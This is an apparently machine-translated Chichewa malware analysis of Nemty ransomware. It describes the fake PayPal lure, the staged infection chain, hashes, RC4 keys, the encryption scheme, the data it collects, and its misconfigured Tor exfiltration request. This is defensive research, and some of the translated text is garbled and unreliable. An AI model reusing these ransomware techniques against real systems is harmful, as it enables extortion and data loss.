Chiwombolo chatsopano chotchedwa Nemty chawonekera pamanetiweki, omwe akuyenera kukhala wolowa m'malo wa GrandCrab kapena Buran. Pulogalamu yaumbanda imagawidwa kwambiri kuchokera patsamba labodza la PayPal ndipo ili ndi zinthu zingapo zosangalatsa. Tsatanetsatane wa momwe ransomware iyi imagwirira ntchito ili pansi.
Nemty ransomware yatsopano yopezeka ndi ogwiritsa ntchito Seputembara 7, 2019. Pulogalamu yaumbanda idagawidwa kudzera patsamba , ndizothekanso kuti ransomware ilowe pakompyuta kudzera pa RIG exploit kit. Owukirawo adagwiritsa ntchito njira zamaukadaulo kukakamiza wogwiritsa ntchito kuti agwiritse ntchito fayilo ya cashback.exe, yomwe akuti adalandira kuchokera patsamba la PayPal. Ndizodabwitsanso kuti Nemty adatchula doko lolakwika la service proxy Tor, zomwe zimalepheretsa pulogalamu yaumbanda kutumiza. data ku seva. Chifukwa chake, wogwiritsa ntchitoyo amayenera kuyika mafayilo obisika ku netiweki ya Tor yekha ngati akufuna kulipira dipo ndikudikirira kuti omwe akuukirawo atsitsidwe.
Zosangalatsa zingapo za Nemty zikuwonetsa kuti idapangidwa ndi anthu omwewo kapena zigawenga zapaintaneti zomwe zimagwirizana ndi Buran ndi GrandCrab.
- Monga GandCrab, Nemty ali ndi dzira la Isitala - cholumikizira chithunzi cha Purezidenti waku Russia Vladimir Putin ndi nthabwala yonyansa. Cholowa cha GandCrab ransomware chinali ndi chithunzi chokhala ndi mawu omwewo.
- Zolemba zamapulogalamu onsewa zimalozera kwa olemba olankhula Chirasha omwewo.
- Ichi ndi chiwombolo choyamba kugwiritsa ntchito kiyi ya 8092-bit RSA. Ngakhale palibe chifukwa pa izi: kiyi ya 1024-bit ndiyokwanira kuteteza ku kubedwa.
- Monga Buran, chiwombolocho chinalembedwa mu Object Pascal ndipo chinapangidwa ku Borland Delphi.
Static Analysis
Kuchita kwa code yoyipa kumachitika mu magawo anayi. Gawo loyamba ndikuyendetsa cashback.exe, fayilo yotheka ya PE32 pansi pa MS Windows yokhala ndi kukula kwa ma byte 1198936. Khodi yake idalembedwa mu Visual C ++ ndipo idapangidwa pa Okutobala 14, 2013. Ili ndi zolemba zakale zomwe zimangotulutsidwa zokha mukathamanga cashback.exe. Mapulogalamuwa amagwiritsa ntchito laibulale ya Cabinet.dll ndi ntchito zake FDICreate(), FDIDestroy() ndi ena kuti apeze mafayilo kuchokera ku .cab archive.
SHA-256: A127323192ABED93AED53648D03CA84DE3B5B006B641033EB46A520B7A3C16FC
Pambuyo kumasula zakale, owona atatu adzaoneka.
Kenako, temp.exe imayambitsidwa, fayilo yotheka ya PE32 pansi pa MS Windows yokhala ndi kukula kwa ma byte 307200. Khodiyo imalembedwa mu Visual C ++ ndipo imapakidwa ndi MPRESS packer, paketi yofanana ndi UPX.
SHA-256: EBDBA4B1D1DE65A1C6B14012B674E7FA7F8C5F5A8A5A2A9C3C338F02DD726AAD
Gawo lotsatira ndi ironman.exe. Ikangokhazikitsidwa, temp.exe imachotsa zomwe zasungidwa mu temp ndikuzisintha kukhala ironman.exe, fayilo ya 32 byte PE544768. Khodiyo idapangidwa ku Borland Delphi.
SHA-256: 2C41B93ADD9AC5080A12BF93966470F8AB3BDE003001492A10F63758867F2A88
Chomaliza ndikuyambitsanso fayilo ya ironman.exe. Panthawi yothamanga, imasintha code yake ndikudziyendetsa yokha kuchokera pamtima. Mtundu uwu wa ironman.exe ndi woyipa ndipo umayambitsa kubisa.
Attack vector
Pakadali pano, Nemty ransomware imagawidwa kudzera patsamba pp-back.info.
The unyolo wathunthu matenda akhoza kuonedwa pa sandbox.
kolowera
Cashback.exe - chiyambi cha kuukira. Monga tanenera kale, cashback.exe imatsegula fayilo ya .cab yomwe ili. Kenako imapanga foda ya TMP4351$.TMP ya mawonekedwe %TEMP%IXxxx.TMP, pomwe xxx ndi nambala yochokera ku 001 mpaka 999.
Kenako, kiyi ya registry imayikidwa, yomwe imawoneka motere:
βrundll32.exeβ βC:Windowssystem32advpack.dll,DelNodeRunDLL32 βC:UsersMALWAR~1AppDataLocalTempIXPxxx.TMPββ
Amagwiritsidwa ntchito kufufuta mafayilo osapakidwa. Pomaliza, cashback.exe imayamba njira ya temp.exe.
Temp.exe ndi gawo lachiwiri mu unyolo wa matenda
Iyi ndi njira yomwe idakhazikitsidwa ndi fayilo ya cashback.exe, gawo lachiwiri la kupha kachilomboka. Imayesa kutsitsa AutoHotKey, chida chogwiritsira ntchito zolemba pa Windows, ndikuyendetsa WindowSpy.ahk script yomwe ili mu gawo lazothandizira pa fayilo ya PE.
Zolemba za WindowSpy.ahk zimachotsa fayilo ya temp mu ironman.exe pogwiritsa ntchito algorithm ya RC4 ndi mawu achinsinsi a IwantAcake. Chinsinsi cha mawu achinsinsi chimapezeka pogwiritsa ntchito MD5 hashing algorithm.
temp.exe ndiye imayitana njira ya ironman.exe.
Ironman.exe - sitepe yachitatu
Ironman.exe amawerenga zomwe zili mu fayilo ya iron.bmp ndikupanga fayilo ya iron.txt yokhala ndi cryptolocker yomwe idzayambitsidwe pambuyo pake.
Zitatha izi, kachilomboka kamadzaza iron.txt mu kukumbukira ndikuyambiranso ngati ironman.exe. Pambuyo pake, iron.txt imachotsedwa.
ironman.exe ndiye gawo lalikulu la NEMTY ransomware, lomwe limabisa mafayilo pamakompyuta omwe akhudzidwa. Malware amapanga mutex wotchedwa chidani.
Chinthu choyamba chomwe chimachita ndikuzindikira komwe kompyuta ili. Nemty amatsegula msakatuli ndikupeza IP ili . Pamalo [IP]/countryName Dzikoli limatsimikiziridwa ndi IP yolandiridwa, ndipo ngati kompyutayo ili m'chigawo chimodzi chomwe chili pansipa, kuyimitsidwa kwa nambala yaumbanda kuyimitsidwa:
- Russia
- Belarus
- Ukraine
- Kazakhstan
- Tajikistan
Mwachidziwikire, omanga sakufuna kukopa chidwi cha mabungwe azamalamulo m'maiko omwe akukhala, motero samabisa mafayilo m'malo awo "zanyumba".
Ngati adilesi ya IP ya wozunzidwayo siili pamndandanda womwe uli pamwambapa, ndiye kuti kachilomboka kamabisa zambiri za wogwiritsa ntchito.
Pofuna kupewa kuchira kwa fayilo, zolemba zawo zazithunzi zimachotsedwa:
Kenako imapanga mndandanda wamafayilo ndi zikwatu zomwe sizingasinthidwe, komanso mndandanda wazowonjezera mafayilo.
- mawindo
- $RECYCLE.BIN
- rsa
- NTDETECT.COM
- ndi zina
- MSDOS.SYS
- IO.SYS
- boot.ini AUTOEXEC.BAT ntuser.dat
- desktop.ini
- SYS CONFIG.
- BOOTSECT.BAK
- kutchfun
- pulogalamudata
- data ya app
- osoft
- Common Files
log LOG CAB cab CMD cmd COM com cpl
CPL exe EXE ini INI dll DDL lnk LNK url
URL ttf TTF DECRYPT.txt NEMTY Obfuscation
Kuti abise ma URL ndi deta yokhazikika, Nemty amagwiritsa ntchito base64 ndi RC4 encoding algorithm yokhala ndi fuckav keyword.
Njira yosinthira pogwiritsa ntchito CryptStringToBinary ili motere
Kubisa
Nemty amagwiritsa ntchito kubisa kwa magawo atatu:
- AES-128-CBC yamafayilo. Kiyi ya 128-bit AES imapangidwa mwachisawawa ndipo imagwiritsidwa ntchito chimodzimodzi pamafayilo onse. Izo zimasungidwa mu fayilo kasinthidwe pa kompyuta wosuta. IV imapangidwa mwachisawawa pafayilo iliyonse ndikusungidwa mufayilo yosungidwa.
- RSA-2048 ya kubisa mafayilo IV. Magulu awiri ofunikira a gawoli amapangidwa. Kiyi yachinsinsi ya gawoli imasungidwa mufayilo yosinthira pakompyuta ya wogwiritsa ntchito.
- RSA-8192. Kiyi yapagulu ya master imapangidwa mu pulogalamuyi ndipo imagwiritsidwa ntchito kubisa fayilo yosinthira, yomwe imasunga kiyi ya AES ndi kiyi yachinsinsi ya gawo la RSA-2048.
- Nemty imapanga ma byte 32 a data mwachisawawa. Ma byte 16 oyamba amagwiritsidwa ntchito ngati kiyi ya AES-128-CBC.
Algorithm yachiwiri ya encryption ndi RSA-2048. Makiyi awiriwa amapangidwa ndi ntchito ya CryptGenKey () ndikutumizidwa ndi CryptImportKey () ntchito.
Makiyi a gawoli akapangidwa, kiyi yapagulu imatumizidwa ku MS Cryptographic Service Provider.
Chitsanzo cha kiyi yopangidwa ndi anthu pagawo:
Kenako, kiyi yachinsinsi imatumizidwa ku CSP.
Chitsanzo cha kiyi yachinsinsi yopangidwa pagawo:
Ndipo potsiriza akubwera RSA-8192. Chinsinsi chachikulu cha anthu chimasungidwa mu mawonekedwe obisika (Base64 + RC4) mu gawo la .data la fayilo ya PE.
Makiyi a RSA-8192 pambuyo pa decoding base64 ndi RC4 decryption yokhala ndi mawu achinsinsi a fuckav amawoneka chonchi.
Zotsatira zake, ndondomeko yonse ya encryption ikuwoneka motere:
- Pangani kiyi ya 128-bit AES yomwe idzagwiritsidwe ntchito kubisa mafayilo onse.
- Pangani IV pa fayilo iliyonse.
- Kupanga awiri ofunikira pa gawo la RSA-2048.
- Kumasulira kwa kiyi yomwe ilipo ya RSA-8192 pogwiritsa ntchito base64 ndi RC4.
- Lembani zomwe zili mufayilo pogwiritsa ntchito AES-128-CBC algorithm kuyambira sitepe yoyamba.
- IV encryption pogwiritsa ntchito RSA-2048 public key and base64 encoding.
- Kuonjezera encrypted IV kumapeto kwa fayilo iliyonse yobisidwa.
- Kuwonjezera kiyi ya AES ndi kiyi yachinsinsi ya RSA-2048 pakusintha.
- Zambiri zamasinthidwe zomwe zafotokozedwa mugawo za makompyuta omwe ali ndi kachilombo amasungidwa pogwiritsa ntchito kiyi yayikulu ya RSA-8192.
- Fayilo yosungidwa ikuwoneka motere:
Chitsanzo cha mafayilo obisika:
Kusonkhanitsa zambiri za kompyuta kachilombo
The ransomware imasonkhanitsa makiyi kuti asinthe mafayilo omwe ali ndi kachilomboka, kuti wowukirayo azitha kupanga decryptor. Kuphatikiza apo, Nemty imasonkhanitsa deta ya ogwiritsa ntchito monga dzina lolowera, dzina la kompyuta, mbiri ya hardware.
Imayitanitsa GetLogicalDrives(), GetFreeSpace(), GetDriveType() ntchito kuti atolere zambiri zama drive omwe ali ndi kachilomboka.
Zomwe zasonkhanitsidwa zimasungidwa mufayilo yokonzekera. Titasankha chingwecho, timapeza mndandanda wa magawo mu fayilo yosinthira:
Chitsanzo cha kasinthidwe ka kompyuta yomwe ili ndi kachilombo:
The template yokonzekera ikhoza kuyimiridwa motere:
{"General": {"IP":"[IP]", "Country":"[Country]", "ComputerName":"[ComputerName]", "Username":"[Username]", "OS": "[OS]", "isRU":false, "version":"1.4", "CompID":"{[CompID]}", "FileID":"_NEMTY_[FileID]_", "UserID":"[ UserID]", "kiyi":"[kiyi]", "pr_key":"[pr_key]
Nemty amasunga zomwe zasonkhanitsidwa mumtundu wa JSON mufayilo %USER%/_NEMTY_.nemty. FileID ndi zilembo 7 zazitali komanso zopangidwa mwachisawawa. Mwachitsanzo: _NEMTY_tgdLYrd_.nemty. FileID imaphatikizidwanso kumapeto kwa fayilo yosungidwa.
Chidziwitso cha Dipo
Mukasindikiza mafayilo, fayilo _NEMTY_[FileID]-DECRYPT.txt imawonekera pakompyuta ndi izi:
Pamapeto pa wapamwamba pali encrypted zambiri za kachilombo kompyuta.
Kulankhulana pa intaneti
Njira ya ironman.exe imatsitsa kugawa kwa msakatuli wa Tor kuchokera ku adilesi ndikuyesa kuyiyika.
Nemty ndiye amayesa kutumiza deta yosinthira ku 127.0.0.1:9050, kumene ikuyembekeza kupeza wogwirizira wa Tor browser. Komabe, mwachisawawa wothandizira wa Tor amamvetsera pa doko 9150, ndipo port 9050 imagwiritsidwa ntchito ndi Tor daemon pa Linux kapena Expert Bundle pa Windows. Chifukwa chake, palibe deta yomwe imatumizidwa ku seva ya wowukirayo. M'malo mwake, wogwiritsa ntchito amatha kutsitsa fayilo yosinthira pamanja poyendera ntchito ya Tor decryption kudzera pa ulalo womwe waperekedwa mu uthenga wa dipo.
Kulumikiza ku projekiti ya Tor:
HTTP GET imapanga pempho ku 127.0.0.1:9050/public/gate?data=
Apa mutha kuwona madoko otseguka a TCP omwe amagwiritsidwa ntchito ndi woyimira TORlocal:
Ntchito ya Nemty decryption pa netiweki ya Tor:
Mutha kukweza chithunzi chobisidwa (jpg, png, bmp) kuti muyese ntchito yotsitsa.
Pambuyo pa izi, woukirayo akupempha kulipira dipo. Kupanda kulipira mtengowo umawirikiza kawiri.
Pomaliza
Pakadali pano, sikutheka kutulutsa mafayilo osungidwa ndi Nemty osalipira dipo. Mtundu uwu wa ransomware uli ndi zofananira ndi Buran ransomware ndi GandCrab yakale: kuphatikiza ku Borland Delphi ndi zithunzi zomwe zili ndi mawu omwewo. Kuphatikiza apo, iyi ndiye encryptor yoyamba yomwe imagwiritsa ntchito fungulo la 8092-bit RSA, lomwe, silipanganso tanthauzo lililonse, popeza kiyi ya 1024-bit ndi yokwanira kuteteza. Pomaliza, komanso chosangalatsa, imayesa kugwiritsa ntchito doko lolakwika pa ntchito ya proxy ya Tor.
Komabe, mayankho ΠΈ kuletsa Nemty ransomware kufikira ma PC ogwiritsa ntchito ndi data, ndipo opereka amatha kuteteza makasitomala awo . Zodzaza amapereka osati zosunga zobwezeretsera, komanso chitetezo ntchito , ukadaulo wapadera wotengera luntha lochita kupanga komanso machitidwe omwe amakupatsani mwayi kuti muchepetse pulogalamu yaumbanda yomwe sichikudziwika.
Source: www.habr.com